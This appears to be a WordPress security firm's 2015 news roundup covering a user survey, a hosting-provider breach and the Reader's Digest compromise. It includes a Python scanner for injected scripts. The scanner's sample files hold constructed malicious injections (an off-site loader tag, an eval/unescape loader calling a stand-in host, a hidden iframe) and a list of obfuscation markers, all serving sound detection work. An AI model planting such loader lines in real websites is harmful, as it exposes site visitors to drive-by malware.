WordPress Security: 2015 in Review

Another day, another year and 2015 is drawing to a close. It’s been an interesting year with Donald Trump making waves in the presidential elections, and finishing off with Steve Harvey crowning the wrong Miss Universe! 2015 is a year to remember. In the midst of the holiday cheer, it’s also the time to reflect back on the past year to learn and grow from our mistakes.

By mistakes, we mean lapses in your WordPress security – not how you need to start hitting the gym! With attacks on WordPress sites on the rise, it’s more important than ever to keep your site safe and to watch out for some common pitfalls. Only last month, data security firm Imperva reported in its WAAR Report 2015 that WordPress sites were attacked 3.5 times more often than sites running on other content management systems.

Wordfence has released the results of its first annual WordPress Security Survey. A large sample of 7,375 WordPress users took part, and the survey gives a picture of the security behaviour of WordPress users from those with little or no experience through to experts.

Of the respondents, 38.9% admitted to having been the victim of a WordPress attack in the past year. It appears that most victims were not proactively scanning their site for malware but stumbled upon the compromise: over 35% said they discovered it while visiting their own site, around 27% said their hosting provider took the site offline, and 26% were told by a customer.

Although more than half of WordPress users say their income is badly affected when their site is compromised, the survey results show that expert users were far more concerned about site security than advanced and intermediate users.

Plugins often make the news for introducing vulnerabilities into a site, yet interestingly the survey found that the most commonly installed type of plugin was a security plugin, closely followed by contact form, SEO and anti-spam plugins.

As a site owner, it’s your responsibility to keep your site well protected. Use these 4 simple ways to protect your site and reduce the chance of it ever being compromised.

Merry Christmas and a Happy New Year from everybody at WPSOS! See you next year ;)

GoDaddy and SiteLock Partner to Add Security to Small Business WordPress Sites

It seems like every week there are new reports of attacks on WordPress sites, and according to recent reports the numbers keep rising. GoDaddy, the highly popular domain registrar and web hosting company, has decided to add extra security to WordPress sites owned by small businesses. The company has partnered with SiteLock, a website security provider, to reduce security vulnerabilities and attacks.

The two companies, which have been working together since April 2014, have announced a new plugin aimed at web developers and designers. With one click, businesses can see and understand their website’s security status: the plugin gives an at-a-glance view of security scan results inside the WordPress dashboard, without having to leave the site.

“This brought their security information to the forefront in WordPress so they can manage their portfolio of websites without having to ever leave the WordPress site,” SiteLock President Feather said. “They can scan to make sure it’s free of malware and can do all this within one interface. It’s a powerful tool for them because it enables them to do it in real time as they’re working and adding features to their site.”

Other features include security scans of WordPress pages still in draft, and real-time updates so that the gap between a threat being identified and resolved is kept to a minimum. The plugin can also recognise specific vulnerabilities and resolve them on its own.

Tom Serani, SiteLock Executive Vice President of Business Development, said, “As the hosting space continues to evolve, we wanted to offer a strategic solution through a trusted small business advisor and partner like GoDaddy. We worked together to make it easy for customers to seamlessly integrate security into their sites.”

Users can use a single set of login credentials through the plugin to access and manage both their GoDaddy account and their SiteLock information. That convenience also means one set of credentials now guards both services, so protecting it with a strong, unique password (and two-factor authentication where it is offered) matters all the more.

WP Engine Suffers Security Breach

WP Engine has suffered a major security breach, forcing it to reset over 30,000 customers’ passwords. On Tuesday the WordPress hosting company acknowledged the attack and posted recommendations on resetting passwords, with step-by-step links on how to do it.

WP Engine is a managed WordPress hosting provider that runs mission-critical sites around the world. It is an independent company rather than part of WordPress itself, and until now it had largely stayed out of the security headlines that regularly feature WordPress core, themes and plugins.

In an urgent security notification on its site, WP Engine announced the security breach. They said, “At WP Engine we are committed to providing robust security. We are writing today to let you know that we learned of an exposure involving some of our customers’ credentials. Out of an abundance of caution, we are proactively taking security measures across our entire customer base.”

“We have begun an investigation, however there is immediate action we are taking. Additionally, there is action that requires your immediate attention” said the WP Engine Team, referring to the resetting of passwords. “While we have no evidence that the information was used inappropriately, as a precaution, we are invalidating the following five passwords associated with your WP Engine account. This means you will need to reset each of them.”

The firm promptly notified its clients of the incident and of how to protect their accounts. Anyone with a WP Engine account should reset their password, change it anywhere else the same password was reused, and keep a close eye on incoming email and on their financial transactions.

WP Engine apologized for the attack, “We apologize for any inconvenience this event may have caused. We are taking this exposure as an opportunity to review and enhance our security, and remain committed to strong internal security practices and processes.”

Breaking News: Reader’s Digest and other WordPress sites are compromised

A large number of Internet users have been hit by the Angler exploit kit over the past week after visiting compromised websites. The campaign has been pushed from many WordPress sites, most notably that of Reader’s Digest, the popular monthly family magazine.

According to the security blog Malwarebytes, the attack consists of compromised WordPress sites injected with a malicious script that loads a second URL, whose final purpose is to serve the Angler exploit kit. Owners of WordPress sites should bear in mind that although the injected scripts and URLs follow the same pattern, the specific domains and code change over time, so a check keyed to one sample will miss the next one.
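Because the injected domains keep changing, a practical first pass is not a signature for one sample but a check for the class of injection: off-site script loaders, hidden iframes, and inline scripts built from obfuscation primitives. The scanner below is an added example written for this post, not code from the original article or from Malwarebytes; the allowlist, the obfuscation markers, the `.invalid` domains and the sample theme and plugin files are all constructed for illustration and should be tuned to the site being checked.

```python
"""Heuristic scanner for injected <script>/<iframe> loaders in a WordPress tree.

Added example, not code from the original post or from Malwarebytes. The
allowlist, the obfuscation markers and the sample files are constructed
for illustration; tune them to the site being checked.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# <script src="..."> tags: flag any whose host is not on the site's allowlist
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.I)
# inline <script> blocks (tags without a src attribute)
INLINE_SCRIPT = re.compile(r'<script(?![^>]*\ssrc)[^>]*>(.*?)</script>', re.I | re.S)
IFRAME_TAG = re.compile(r'<iframe[^>]*>', re.I)
HIDDEN_ATTR = re.compile(
    r'(?:width|height)\s*=\s*["\']?0\b|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
# markers typical of injected loaders (a heuristic assumption, not a signature)
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(", "atob(")


def scan_text(text, allowed_hosts):
    """Return a list of (kind, detail) findings for one file's contents."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        src = m.group(1).strip()
        host = urlparse(src).hostname  # None for relative paths such as /wp-includes/js/...
        if host and host.lower() not in allowed:
            findings.append(("external-script", src))
    for m in INLINE_SCRIPT.finditer(text):
        body = m.group(1)
        hits = [k for k in OBFUSCATION_MARKERS if k in body]
        hex_escapes = len(re.findall(r'\\x[0-9a-fA-F]{2}', body))
        if len(hits) >= 2 or hex_escapes >= 8:
            findings.append(("obfuscated-inline", ",".join(hits) or f"{hex_escapes} hex escapes"))
    for m in IFRAME_TAG.finditer(text):
        tag = m.group(0)
        if HIDDEN_ATTR.search(tag):
            findings.append(("hidden-iframe", tag[:80]))
    return findings


def scan_tree(root, allowed_hosts, exts=(".php", ".js", ".html", ".htm")):
    """Walk a WordPress install and map relative path -> findings (only files with findings)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read(), allowed_hosts)
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed sample install: one clean theme file and three injected ones.
SAMPLE_FILES = {
    "wp-content/themes/demo/header.php": (
        '<?php wp_head(); ?>\n'
        '<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
        '<script src="https://cdn.example.com/lib.js"></script>\n'
    ),
    "wp-content/themes/demo/footer.php": (
        '<?php wp_footer(); ?>\n</body></html>\n'
        # constructed injection: an off-site loader appended after the closing tag
        '<script src="http://loader.injected.invalid/stats.php"></script>\n'
    ),
    "wp-content/plugins/demo/index.php": (
        '<?php /* plugin bootstrap */ ?>\n'
        '<script>eval(unescape("%3Cscript%20src%3D%22http%3A//x.invalid/a.js%22%3E%3C/script%3E"));</script>\n'
    ),
    "wp-content/uploads/cache.html": (
        '<html><body>\n'
        '<iframe src="http://frame.injected.invalid/" width="0" height="0" style="display:none"></iframe>\n'
        '</body></html>\n'
    ),
}


def build_sample_site():
    """Write the constructed sample files into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Scan the constructed sample site with a constructed allowlist."""
    return scan_tree(build_sample_site(), ["cdn.example.com", "www.example.com"])


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        for kind, detail in findings:
            print(f"{path}: {kind}: {detail}")
```

Run it directly to see the three injected files flagged while the clean header passes. The allowlist check is the part that survives the attackers rotating domains: any new off-site host shows up without a signature update. It is still a heuristic, so confirm hits by comparing the flagged files against a known-good copy of the theme or plugin (a fresh download or version control) before cleaning, and expect to extend the marker list for inline-only injections.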

Malwarebytes’ initial investigation found that visitors to the compromised sites are served the Angler exploit kit, which drops the Bedep trojan, which in turn downloads the Necurs backdoor onto the visitor’s computer. If you have visited Reader’s Digest or any other compromised site recently, run a security scan on your computer.

But if your site is one of the infected ones, don’t hesitate to contact us. Cleaning up malware and hacker attacks on WordPress sites is our specialty, and our highly experienced team has seen all kinds of viruses and malware and dealt with them effectively.

In an email to SCMagazine on Tuesday, Reader’s Digest spokesperson Pauli Cohen said, “We became aware of the malware attack last week and have been working with our security provider, technology partners and platform provider to investigate the issue and perform extensive security checks on our website. At this point, we are addressing all known vulnerabilities of the site. We take security very seriously and are taking every step to ensure the integrity of our site.”

Although our specialty is restoring security to hacked WordPress sites, we believe it is always better to guard against an attack in the first place. Getting your site back up and running is no problem for us, but once you realise your site has been hacked, call us at +1 (650) 600-1970 as soon as possible to limit the damage.